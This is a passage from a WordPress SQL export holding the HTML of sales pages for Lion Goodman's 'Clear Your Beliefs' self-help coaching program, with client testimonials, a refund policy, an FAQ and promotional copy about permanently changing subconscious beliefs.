/></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center;">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" >ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank" >BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" >ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p> </p>', 'SK', '', 'publish', 'closed', 'closed', '', 'sk', '', '', '2015-08-06 00:24:51', '2015-08-06 05:24:51', '', 2233, 'http://clearyourbeliefs.com/?page_id=2237', 0, 'page', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2233, 2, '2015-08-06 00:18:47', '2015-08-06 05:18:47', '&nbsp;			<p></p>\n\n<p></p>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></h1>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package" >Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\n<p>\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change 